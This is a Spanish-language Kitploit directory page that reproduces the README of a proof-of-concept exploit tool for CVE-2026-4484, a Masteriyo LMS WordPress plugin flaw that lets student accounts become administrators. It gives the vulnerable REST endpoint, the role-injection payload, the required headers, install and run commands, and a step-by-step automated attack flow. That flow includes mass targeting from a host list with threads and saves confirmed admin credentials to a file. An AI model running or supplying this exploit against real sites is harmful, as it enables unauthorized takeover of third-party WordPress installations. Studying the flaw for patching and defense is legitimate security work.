Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 - Falta de autorización que permite a usuarios autenticados (Estudiante+) escalar privilegios a Administrador | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-4484
Autenticación y AutorizaciónEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Falta de autorización que permite a usuarios autenticados (Estudiante+) escalar privilegios a Administrador

Ver Repositorio
11hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Autorización faltante que permite la escalada de privilegios de usuario autenticado (Estudiante+) a Administrador

Typing SVG


🔴 Resumen de la vulnerabilidad

CVE-2026-4484 — Escalada de privilegios autenticada (Estudiante → Administrador)

CampoDetalles
ID CVECVE-2026-4484
GravedadALTA — Puntuación CVSS v3.1: 8.8
VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Software afectadoComplemento Masteriyo LMS para WordPress
Versiones afectadasTodas las versiones hasta la 2.1.6 inclusive
Tipo de vulnerabilidadEscalada de privilegios (manipulación de roles)
Autenticación requeridaSí — nivel Estudiante o superior
CWECWE-269: Gestión inadecuada de privilegios

Descripción:
El complemento Masteriyo LMS para WordPress es vulnerable a la escalada de privilegios en todas las versiones hasta la 2.1.6 inclusive. La vulnerabilidad se origina en la función InstructorsController::prepare_object_for_database, que no restringe adecuadamente la asignación de roles durante las solicitudes a la API REST. Un atacante autenticado con tan solo acceso de nivel Estudiante puede elaborar una solicitud POST especialmente diseñada al endpoint de la API REST de Masteriyo — inyectando "roles": ["administrator"] en el payload de la solicitud — para elevar silenciosamente su cuenta a Administrador de WordPress, logrando la toma completa del sitio sin ninguna interacción administrativa.


🛠️ Descripción de la herramienta

Este es un script de explotación de Prueba de Concepto (PoC) dirigido a instalaciones de WordPress que ejecutan una versión vulnerable del complemento Masteriyo LMS. La herramienta admite dos modos de ataque:

ModoNombreFlujoCaso de uso
1Nx_1Registrarse → Iniciar sesión → Escalar → Verificar AdminAtaque desde cero — no se necesita cuenta existente
2Nx_2Iniciar sesión → Escalar → Verificar AdminCuenta existente disponible (Estudiante/Instructor)

Flujo de ataque

[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 Requisitos

Requisitos del sistema

  • Python 3.8 o superior
  • Linux / Windows / macOS

Dependencias de Python

pip install requests urllib3 colorama

O mediante el archivo de requisitos:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Instalación

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ Uso

Ejecución básica

python3 CVE-2026-4484.py

La herramienta utiliza una interfaz de terminal interactiva: todos los parámetros se solicitan en tiempo de ejecución.


🗂️ Formato de la lista de objetivos

Crea un archivo de texto plano (p. ej., list.txt) con un objetivo por línea:

https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 Modo 1 — Nx_1 (Registro + Inicio de sesión + Escalada)

Usa este modo cuando no tengas una cuenta existente en el objetivo. La herramienta registra automáticamente una nueva cuenta de estudiante y luego la escala.

Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

Pasos realizados automáticamente:

  1. GET /account/signup/ → extraer nonce de registro
  2. POST /st/ → registrar nueva cuenta como Estudiante
  3. GET /account/ → extraer nonce de inicio de sesión
  4. POST /wp-admin/admin-ajax.php → iniciar sesión mediante Masteriyo AJAX
  5. GET /account/#/dashboard → extraer current_user_id + nonce
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} con {"roles":["administrator"]}
  7. Volver a iniciar sesión con una sesión nueva → verificar el acceso al panel de administración
  8. Escribir los aciertos confirmados en Login_admin.txt

🟩 Modo 2 — Nx_2 (Inicio de sesión + Escalada — Cuenta existente)

Usa este modo cuando ya tengas una cuenta válida de Estudiante o Instructor en el objetivo.

Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

Pasos realizados automáticamente:

  1. GET /account/ → extraer nonce de inicio de sesión
  2. POST /wp-admin/admin-ajax.php → iniciar sesión mediante Masteriyo AJAX
  3. GET /account/#/dashboard → extraer current_user_id + nonce
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} con {"roles":["administrator"]}
  5. Volver a iniciar sesión con una sesión nueva → verificar el acceso al panel de administración
  6. Escribir los aciertos confirmados en Login_admin.txt

📁 Archivos de salida

ArchivoDescripción
Login_admin.txtTodas las escaladas a administrador confirmadas

Formato de salida

https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

Ejemplo de salida de terminal

[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 Detalles técnicos

Endpoint vulnerable

POST /wp-json/masteriyo/v1/users/instructors/{user_id}

Payload de explotación

{
  "roles": ["administrator"]
}

Cabeceras necesarias

Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

Causa raíz

Descargar herramienta